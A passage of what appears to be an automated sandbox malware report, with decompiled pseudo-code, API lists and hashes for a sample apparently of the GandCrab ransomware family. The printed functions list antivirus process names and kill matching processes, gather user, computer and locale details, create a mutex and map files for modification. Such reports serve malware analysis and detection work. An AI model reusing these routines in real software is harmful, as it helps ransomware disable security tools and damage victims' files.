                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00404F8F
                                      • wsprintfW.USER32 ref: 00404FA7
                                      • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00404FB8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Virtual$AllocFree$Sleeplstrcmpilstrlenwsprintf
                                      • String ID: .bit$.bit$crab$emsi$fabian wosar <3$gand$soft
                                      • API String ID: 2709691373-1090818981
                                      • Opcode ID: edd6b09a321c72d76f54713700b51503e045287bd620de7e5e9023b5f02d4a1f
                                      • Instruction ID: 12e809f3953ca4ef3e333bd49a631b39bc1f07fb3bc4506d08caa0eda9158355
                                      • Opcode Fuzzy Hash: edd6b09a321c72d76f54713700b51503e045287bd620de7e5e9023b5f02d4a1f
                                      • Instruction Fuzzy Hash: 34317AB1A04319ABDB11DFA4AD45BAEBBB8FB84710F10013AF701B72D1D7B45905CB99
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 80%
                                      			E00407520(void** _a4, intOrPtr* _a8) {
                                      				signed int _v8;
                                      				long _v12;
                                      				long _v16;
                                      				void* _v20;
                                      				void* _v24;
                                      				WCHAR* _v28;
                                      				WCHAR* _v32;
                                      				WCHAR* _v36;
                                      				WCHAR* _v40;
                                      				WCHAR* _v44;
                                      				WCHAR* _v48;
                                      				WCHAR* _v52;
                                      				WCHAR* _v56;
                                      				WCHAR* _v60;
                                      				WCHAR* _v64;
                                      				WCHAR* _v68;
                                      				WCHAR* _v72;
                                      				WCHAR* _v76;
                                      				WCHAR* _v80;
                                      				void* _t46;
                                      				void* _t47;
                                      				void* _t49;
                                      				int _t50;
                                      				WCHAR* _t56;
                                      				int _t63;
                                      				void** _t68;
                                      				void* _t75;
                                      				long _t76;
                                      				WCHAR* _t77;
                                      				signed int _t79;
                                      				void* _t83;
                                      
                                      				_t46 = VirtualAlloc(0, 0x400, 0x3000, 4); // executed
                                      				_t68 = _a4;
                                      				 *_t68 = _t46;
                                      				_v80 = L"AVP.EXE";
                                      				_v76 = L"ekrn.exe";
                                      				_v72 = L"avgnt.exe";
                                      				_v68 = L"ashDisp.exe";
                                      				_v64 = L"NortonAntiBot.exe";
                                      				_v60 = L"Mcshield.exe";
                                      				_v56 = L"avengine.exe";
                                      				_v52 = L"cmdagent.exe";
                                      				_v48 = L"smc.exe";
                                      				_v44 = L"persfw.exe";
                                      				_v40 = L"pccpfw.exe";
                                      				_v36 = L"fsguiexe.exe";
                                      				_v32 = L"cfp.exe";
                                      				_v28 = L"msmpeng.exe";
                                      				_t47 = VirtualAlloc(0, 4, 0x3000, 4); // executed
                                      				_t75 = _t47;
                                      				_v24 = _t75;
                                      				if(_t75 == 0) {
                                      					L3:
                                      					return 0;
                                      				} else {
                                      					 *_t75 = 0x22c; // executed
                                      					_t49 = CreateToolhelp32Snapshot(2, 0); // executed
                                      					_v20 = _t49;
                                      					if(_t49 != 0xffffffff) {
                                      						_t79 = 0;
                                      						_push(_t75);
                                      						_v12 = 0;
                                      						_a4 = 0;
                                      						_v16 = 0;
                                      						_v8 = 0;
                                      						_t50 = Process32FirstW(_t49); // executed
                                      						if(_t50 != 0) {
                                      							L6:
                                      							while(_t79 == 0) {
                                      								_t77 = _t75 + 0x24;
                                      								while(lstrcmpiW( *(_t83 + _t79 * 4 - 0x4c), _t77) != 0) {
                                      									_t79 = _t79 + 1;
                                      									if(_t79 < 0xe) {
                                      										continue;
                                      									} else {
                                      										_t79 = _v8;
                                      									}
                                      									L15:
                                      									_t75 = _v24;
                                      									_t63 = Process32NextW(_v20, _t75); // executed
                                      									if(_t63 != 0 && GetLastError() != 0x12) {
                                      										goto L6;
                                      									}
                                      									goto L17;
                                      								}
                                      								_push(_t77);
                                      								_push( *_t68);
                                      								_v16 = 1;
                                      								if(_a4 != 0) {
                                      									lstrcatW();
                                      									lstrcatW( *_t68, ",");
                                      								} else {
                                      									lstrcpyW();
                                      									lstrcatW( *_t68, ",");
                                      								}
                                      								_a4 =  &(_a4[0]);
                                      								_v12 = _v12 + lstrlenW(_t77) * 2;
                                      								_t79 =  >  ? 1 : _v8;
                                      								_v8 = _t79;
                                      								goto L15;
                                      							}
                                      							L17:
                                      							if(_v16 != 0) {
                                      								_t56 =  *_t68;
                                      								if( *_t56 != 0) {
                                      									 *((short*)( *_t68 + lstrlenW(_t56) * 2 - 2)) = 0;
                                      								}
                                      							}
                                      							 *_a8 = _v12;
                                      						}
                                      						VirtualFree(_t75, 0, 0x8000); // executed
                                      						FindCloseChangeNotification(_v20); // executed
                                      						_t76 = _v16;
                                      						if(_t76 == 0) {
                                      							VirtualFree( *_t68, _t76, 0x8000); // executed
                                      						}
                                      						return _t76;
                                      					} else {
                                      						VirtualFree(_t75, 0, 0x8000);
                                      						goto L3;
                                      					}
                                      				}
                                      			}


































                                      0x0040753d
                                      0x0040753f
                                      0x0040754d
                                      0x0040754f
                                      0x00407556
                                      0x0040755d
                                      0x00407564
                                      0x0040756b
                                      0x00407572
                                      0x00407579
                                      0x00407580
                                      0x00407587
                                      0x0040758e
                                      0x00407595
                                      0x0040759c
                                      0x004075a3
                                      0x004075aa
                                      0x004075b1
                                      0x004075b3
                                      0x004075b5
                                      0x004075ba
                                      0x004075e4
                                      0x004075ea
                                      0x004075bc
                                      0x004075c0
                                      0x004075c6
                                      0x004075cc
                                      0x004075d2
                                      0x004075ef
                                      0x004075f1
                                      0x004075f3
                                      0x004075f6
                                      0x004075f9
                                      0x004075fc
                                      0x004075ff
                                      0x00407607
                                      0x00000000
                                      0x00407610
                                      0x00407618
                                      0x00407620
                                      0x0040762f
                                      0x00407633
                                      0x00000000
                                      0x00407635
                                      0x00407635
                                      0x00407635
                                      0x00407697
                                      0x00407697
                                      0x0040769e
                                      0x004076a6
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x004076a6
                                      0x0040763e
                                      0x0040763f
                                      0x00407641
                                      0x00407648
                                      0x00407665
                                      0x0040766e
                                      0x0040764a
                                      0x0040764a
                                      0x00407657
                                      0x00407657
                                      0x00407670
                                      0x0040768e
                                      0x00407691
                                      0x00407694
                                      0x00000000
                                      0x00407694
                                      0x004076b7
                                      0x004076bb
                                      0x004076bd
                                      0x004076c3
                                      0x004076d0
                                      0x004076d0
                                      0x004076c3
                                      0x004076db
                                      0x004076db
                                      0x004076eb
                                      0x004076f0
                                      0x004076f6
                                      0x004076fb
                                      0x00407705
                                      0x00407705
                                      0x0040770f
                                      0x004075d4
                                      0x004075dc
                                      0x00000000
                                      0x004075dc
                                      0x004075d2

                                      APIs
                                      • VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,74CB66A0,?,7491C0B0), ref: 0040753D
                                      • VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000004), ref: 004075B1
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004075C6
                                      • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 004075DC
                                      • Process32FirstW.KERNEL32(00000000,00000000), ref: 004075FF
                                      • lstrcmpiW.KERNEL32(004107DC,-00000024), ref: 00407625
                                      • Process32NextW.KERNEL32(?,?), ref: 0040769E
                                      • GetLastError.KERNEL32 ref: 004076A8
                                      • lstrlenW.KERNEL32(00000000), ref: 004076C6
                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 004076EB
                                      • FindCloseChangeNotification.KERNEL32(?), ref: 004076F0
                                      • VirtualFree.KERNELBASE(?,?,00008000), ref: 00407705
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Virtual$Free$AllocProcess32$ChangeCloseCreateErrorFindFirstLastNextNotificationSnapshotToolhelp32lstrcmpilstrlen
                                      • String ID:
                                      • API String ID: 1411803383-0
                                      • Opcode ID: 3f4a2b444d341badbc1f89ef671cf3f23f637359728da17f4d75482f5b004914
                                      • Instruction ID: 1c74ff85e4bbe89c11da167877251bfadadfb1b789393fb2674ad8a1102b1764
                                      • Opcode Fuzzy Hash: 3f4a2b444d341badbc1f89ef671cf3f23f637359728da17f4d75482f5b004914
                                      • Instruction Fuzzy Hash: DF514D71E04218ABDB109F98DD48B9E7BB4FF85720F20806AE505BB290C7B56D85CF99
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 004039B0: GetProcessHeap.KERNEL32(?,?,00404587,00000000,?,00000000), ref: 00403A4C
                                        • Part of subcall function 00406D90: VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 00406DB7
                                        • Part of subcall function 00406D90: GetUserNameW.ADVAPI32(00000000,?), ref: 00406DC8
                                        • Part of subcall function 00406D90: VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 00406DE6
                                        • Part of subcall function 00406D90: GetComputerNameW.KERNEL32 ref: 00406DF0
                                        • Part of subcall function 00406D90: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 00406E10
                                        • Part of subcall function 00406D90: wsprintfW.USER32 ref: 00406E51
                                        • Part of subcall function 00406D90: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 00406E6E
                                        • Part of subcall function 00406D90: RegOpenKeyExW.KERNEL32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 00406E92
                                        • Part of subcall function 00406D90: RegQueryValueExW.KERNEL32(00000000,LocaleName,00000000,00000000,?,?), ref: 00406EB6
                                        • Part of subcall function 00406D90: RegCloseKey.KERNEL32(00000000), ref: 00406ED2
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406BF2
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406BFD
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C13
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C1E
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(004048B6,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C34
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C3F
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C55
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C60
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C76
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C81
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C97
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406CA2
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406CC1
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406CCC
                                      • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 004045AC
                                      • lstrcpyW.KERNEL32 ref: 004045CF
                                      • lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 004045D6
                                      • CreateMutexW.KERNEL32(00000000,00000000,00000000,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 004045EE
                                      • GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 004045FA
                                      • GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 00404601
                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0040461B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrlen$Virtual$Alloc$ErrorLastName$CloseComputerCreateFreeHeapMutexOpenProcessQueryUserValuelstrcpywsprintf
                                      • String ID: Global\
                                      • API String ID: 3131499543-188423391
                                      • Opcode ID: 60700ccbb66975790bdd6c2481cc6c90d6354a02fbe93d1c0f5e8eb0fcf3caff
                                      • Instruction ID: 4f5a3050133a9d70e6d79b6919bbb594e2943cbf5e181e58d482f905f9ddffb5
                                      • Opcode Fuzzy Hash: 60700ccbb66975790bdd6c2481cc6c90d6354a02fbe93d1c0f5e8eb0fcf3caff
                                      • Instruction Fuzzy Hash: 6721D4B16503217BE224A724DC4BF6F7A5CDB80744F500639F706761D0EAB87D0486EE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00407720(intOrPtr* __ecx) {
                                      				int _t20;
                                      				intOrPtr* _t24;
                                      
                                      				_t24 = __ecx;
                                      				if( *__ecx != 0) {
                                      					_t20 = VirtualFree( *(__ecx + 8), 0, 0x8000);
                                      				}
                                      				if( *((intOrPtr*)(_t24 + 0xc)) != 0) {
                                      					_t20 = VirtualFree( *(_t24 + 0x14), 0, 0x8000);
                                      				}
                                      				if( *((intOrPtr*)(_t24 + 0x18)) != 0) {
                                      					_t20 = VirtualFree( *(_t24 + 0x20), 0, 0x8000); // executed
                                      				}
                                      				if( *((intOrPtr*)(_t24 + 0x30)) != 0) {
                                      					_t20 = VirtualFree( *(_t24 + 0x38), 0, 0x8000);
                                      				}
                                      				if( *((intOrPtr*)(_t24 + 0x3c)) != 0) {
                                      					_t20 = VirtualFree( *(_t24 + 0x44), 0, 0x8000);
                                      				}
                                      				if( *((intOrPtr*)(_t24 + 0x48)) != 0) {
                                      					_t20 = VirtualFree( *(_t24 + 0x50), 0, 0x8000);
                                      				}
                                      				if( *((intOrPtr*)(_t24 + 0x54)) != 0) {
                                      					_t20 = VirtualFree( *(_t24 + 0x5c), 0, 0x8000);
                                      				}
                                      				if( *((intOrPtr*)(_t24 + 0x24)) != 0) {
                                      					_t20 = VirtualFree( *(_t24 + 0x2c), 0, 0x8000);
                                      				}
                                      				if( *((intOrPtr*)(_t24 + 0x60)) != 0) {
                                      					_t20 = VirtualFree( *(_t24 + 0x68), 0, 0x8000); // executed
                                      				}
                                      				if( *((intOrPtr*)(_t24 + 0x80)) != 0) {
                                      					return VirtualFree( *(_t24 + 0x84), 0, 0x8000);
                                      				}
                                      				return _t20;
                                      			}





                                      0x00407721
                                      0x0040772d
                                      0x00407739
                                      0x00407739
                                      0x0040773f
                                      0x0040774b
                                      0x0040774b
                                      0x00407751
                                      0x0040775d
                                      0x0040775d
                                      0x00407763
                                      0x0040776f
                                      0x0040776f
                                      0x00407775
                                      0x00407781
                                      0x00407781
                                      0x00407787
                                      0x00407793
                                      0x00407793
                                      0x00407799
                                      0x004077a5
                                      0x004077a5
                                      0x004077ab
                                      0x004077b7
                                      0x004077b7
                                      0x004077bd
                                      0x004077c9
                                      0x004077c9
                                      0x004077d2
                                      0x00000000
                                      0x004077e1
                                      0x004077e5

                                      APIs
                                      • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0040462A,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 00407739
                                      • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0040462A,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0040774B
                                      • VirtualFree.KERNELBASE(?,00000000,00008000,00000000,00000001,0040462A,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0040775D
                                      • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0040462A,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0040776F
                                      • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0040462A,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 00407781
                                      • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0040462A,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 00407793
                                      • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0040462A,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 004077A5
                                      • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0040462A,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 004077B7
                                      • VirtualFree.KERNELBASE(?,00000000,00008000,00000000,00000001,0040462A,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 004077C9
                                      • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0040462A,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 004077E1
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FreeVirtual
                                      • String ID:
                                      • API String ID: 1263568516-0
                                      • Opcode ID: 3fc008402963f2d3cbecf3a86f23b2e7ee5b4610d3041296055b4ddd3abf16a0
                                      • Instruction ID: 79a2428a1de1d862086b34f36251e2aa8ec78ad52842245a2806986d354140b0
                                      • Opcode Fuzzy Hash: 3fc008402963f2d3cbecf3a86f23b2e7ee5b4610d3041296055b4ddd3abf16a0
                                      • Instruction Fuzzy Hash: C7211C30280B04AAF7762B15CC4AF66B2E1BB40B45F254839F2C1395F08BF97889DF09
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 86%
                                      			E00402890(WCHAR* __ecx, intOrPtr __edx) {
                                      				long _v8;
                                      				intOrPtr _v12;
                                      				void* _v16;
                                      				void* __ebx;
                                      				void* __edi;
                                      				void* __esi;
                                      				void* _t9;
                                      				signed int _t14;
                                      				void* _t18;
                                      				void* _t19;
                                      				void* _t23;
                                      				struct _SECURITY_ATTRIBUTES* _t24;
                                      				WCHAR* _t29;
                                      				void* _t34;
                                      				signed int _t35;
                                      				long _t37;
                                      				void* _t38;
                                      				void* _t40;
                                      
                                      				_t29 = __ecx;
                                      				_t28 = 0;
                                      				_v12 = __edx;
                                      				_t9 = CreateFileW(__ecx, 0x80000000, 1, 0, 3, 0, 0); // executed
                                      				_t34 = _t9;
                                      				if(_t34 == 0xffffffff) {
                                      					L3:
                                      					return 0;
                                      				} else {
                                      					_v8 = GetFileSize(_t34, 0);
                                      					E00403030(0, _t34, _t35); // executed
                                      					asm("sbb esi, esi");
                                      					_t37 = (_t35 & 0x00000003) + 1;
                                      					_t14 = E00403030(0, _t34, _t37);
                                      					asm("sbb eax, eax");
                                      					_t18 = CreateFileMappingW(_t34, 0, ( ~_t14 & 0xfffffffa) + 8, 0, 0, 0); // executed
                                      					_v16 = _t18;
                                      					if(_t18 != 0) {
                                      						_t19 = MapViewOfFile(_t18, _t37, 0, 0, 0); // executed
                                      						_t38 = _t19;
                                      						if(_t38 != 0) {
                                      							_t23 = E00403030(0, _t34, _t38); // executed
                                      							if(_t23 == 0) {
                                      								_push(_t29);
                                      								_t4 = _t38 + 0x53; // 0x53
                                      								_t29 = _t4;
                                      								_t5 = _t23 + 6; // 0x6, executed
                                      								E00407DB0(_t29, _t5); // executed
                                      								_t40 = _t40 + 4;
                                      							}
                                      							_push(_t29);
                                      							_t24 = E00402830(_v12, _t38, _v8); // executed
                                      							_t28 = _t24;
                                      							UnmapViewOfFile(_t38);
                                      						}
                                      						CloseHandle(_v16);
                                      						CloseHandle(_t34);
                                      						return _t28;
                                      					} else {
                                      						CloseHandle(_t34);
                                      						goto L3;
                                      					}
                                      				}
                                      			}





















                                      0x00402890
                                      0x00402899
                                      0x0040289b
                                      0x004028ab
                                      0x004028b1
                                      0x004028b6
                                      0x004028f9
                                      0x00402901
                                      0x004028b8
                                      0x004028c0
                                      0x004028c3
                                      0x004028ca
                                      0x004028cf
                                      0x004028d0
                                      0x004028d8
                                      0x004028e5
                                      0x004028eb
                                      0x004028f0
                                      0x0040290a
                                      0x00402910
                                      0x00402914
                                      0x00402916
                                      0x0040291d
                                      0x0040291f
                                      0x00402920
                                      0x00402920
                                      0x00402923
                                      0x00402926
                                      0x0040292b
                                      0x0040292b
                                      0x0040292e
                                      0x00402937
                                      0x0040293f
                                      0x00402942
                                      0x00402942
                                      0x00402951
                                      0x00402954
                                      0x0040295e
                                      0x004028f2
                                      0x004028f3
                                      0x00000000
                                      0x004028f3
                                      0x004028f0

                                      APIs
                                      • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,74CF82B0,00000000,?,?,00402C02), ref: 004028AB
                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,00402C02), ref: 004028BA
                                      • CreateFileMappingW.KERNELBASE(00000000,00000000,-00000008,00000000,00000000,00000000,?,?,00402C02), ref: 004028E5
                                      • CloseHandle.KERNEL32(00000000,?,?,00402C02), ref: 004028F3
                                      • MapViewOfFile.KERNEL32(00000000,74CF82B1,00000000,00000000,00000000,?,?,00402C02), ref: 0040290A
                                      • UnmapViewOfFile.KERNEL32(00000000,?,?,?,?,00402C02), ref: 00402942
                                      • CloseHandle.KERNEL32(?,?,?,00402C02), ref: 00402951
                                      • CloseHandle.KERNEL32(00000000,?,?,00402C02), ref: 00402954
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$CloseHandle$CreateView$MappingSizeUnmap
                                      • String ID:
                                      • API String ID: 265113797-0
                                      • Opcode ID: 4a3bd338fa8f98e6ea1ce6eff48d1651597d918e060f7fce2cadfb8332af991f
                                      • Instruction ID: c7753fadabc3ce0f8503889d90d66a1a67b62c86d4c9c93fbc6d336bdc04640e
                                      • Opcode Fuzzy Hash: 4a3bd338fa8f98e6ea1ce6eff48d1651597d918e060f7fce2cadfb8332af991f
                                      • Instruction Fuzzy Hash: 8A2134B2B011197FE7106B749D8AF7F7B6CEB45225F00423AFC01B22C1E6789D0045A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 85%
                                      			E00404B10(WCHAR* __ecx) {
                                      				struct _PROCESS_INFORMATION _v20;
                                      				struct _STARTUPINFOW _v92;
                                      				intOrPtr _t15;
                                      				intOrPtr _t16;
                                      				int _t20;
                                      				WCHAR* _t25;
                                      
                                      				asm("xorps xmm0, xmm0");
                                      				_t25 = __ecx;
                                      				asm("movdqu [ebp-0x10], xmm0");
                                      				E00408B30( &_v92, 0, 0x44);
                                      				_t15 =  *0x412b0c; // 0x9d4
                                      				_v92.hStdError = _t15;
                                      				_v92.hStdOutput = _t15;
                                      				_t16 =  *0x412b08; // 0x9d8
                                      				_v92.dwFlags = _v92.dwFlags | 0x00000101;
                                      				_v92.hStdInput = _t16;
                                      				_v92.wShowWindow = 0;
                                      				_v92.cb = 0x44;
                                      				_t20 = CreateProcessW(0, _t25, 0, 0, 1, 0, 0, 0,  &_v92,  &_v20); // executed
                                      				if(_t20 != 0) {
                                      					CloseHandle(_v20);
                                      					return CloseHandle(_v20.hThread);
                                      				} else {
                                      					return GetLastError();
                                      				}
                                      			}









                                      0x00404b1c
                                      0x00404b22
                                      0x00404b24
                                      0x00404b29
                                      0x00404b2e
                                      0x00404b36
                                      0x00404b39
                                      0x00404b3c
                                      0x00404b41
                                      0x00404b48
                                      0x00404b4d
                                      0x00404b58
                                      0x00404b6f
                                      0x00404b77
                                      0x00404b8d
                                      0x00404b98
                                      0x00404b79
                                      0x00404b83
                                      0x00404b83

                                      APIs
                                      • _memset.LIBCMT ref: 00404B29
                                      • CreateProcessW.KERNEL32 ref: 00404B6F
                                      • GetLastError.KERNEL32(?,?,00000000), ref: 00404B79
                                      • CloseHandle.KERNEL32(?,?,?,00000000), ref: 00404B8D
                                      • CloseHandle.KERNEL32(?,?,?,00000000), ref: 00404B92
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseHandle$CreateErrorLastProcess_memset
                                      • String ID: D
                                      • API String ID: 1393943095-2746444292
                                      • Opcode ID: 61a65e664a15e54d92a6dad92bb0d9419f95a51cc1df3f98730657d9a343b283
                                      • Instruction ID: c9167ab5344422c8a44933cba82276f3a3bd4aa998c81f02b44ccbb638d81527
                                      • Opcode Fuzzy Hash: 61a65e664a15e54d92a6dad92bb0d9419f95a51cc1df3f98730657d9a343b283
                                      • Instruction Fuzzy Hash: E3014471E40319ABDB10DFA4DC46BDE7BB8EF04714F104226FA08FA190E7B569548B98
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E004047F8(void* __ebx, WCHAR* __ecx, void* __esi, void* __ebp, void* _a12) {
                                      				int _t8;
                                      				int _t9;
                                      				int _t10;
                                      				void* _t15;
                                      				WCHAR* _t17;
                                      				void* _t18;
                                      				signed int _t23;
                                      				void* _t24;
                                      				void* _t28;
                                      
                                      				_t17 = __ecx;
                                      				_t15 = __ebx;
                                      				while(1) {
                                      					L2:
                                      					_t8 = lstrcmpiW( *(_t28 + 0x14 + _t23 * 4), _t17);
                                      					if(_t8 == 0) {
                                      						_t18 = OpenProcess(1, _t8,  *(_t15 + 8));
                                      						if(_t18 != 0) {
                                      							TerminateProcess(_t18, 0);
                                      							CloseHandle(_t18);
                                      						}
                                      					}
                                      					_t23 = _t23 + 1;
                                      					_t5 = _t15 + 0x24; // 0x24
                                      					_t17 = _t5;
                                      					if(_t23 < 0x27) {
                                      						continue;
                                      					}
                                      					L7:
                                      					_t24 = _a12;
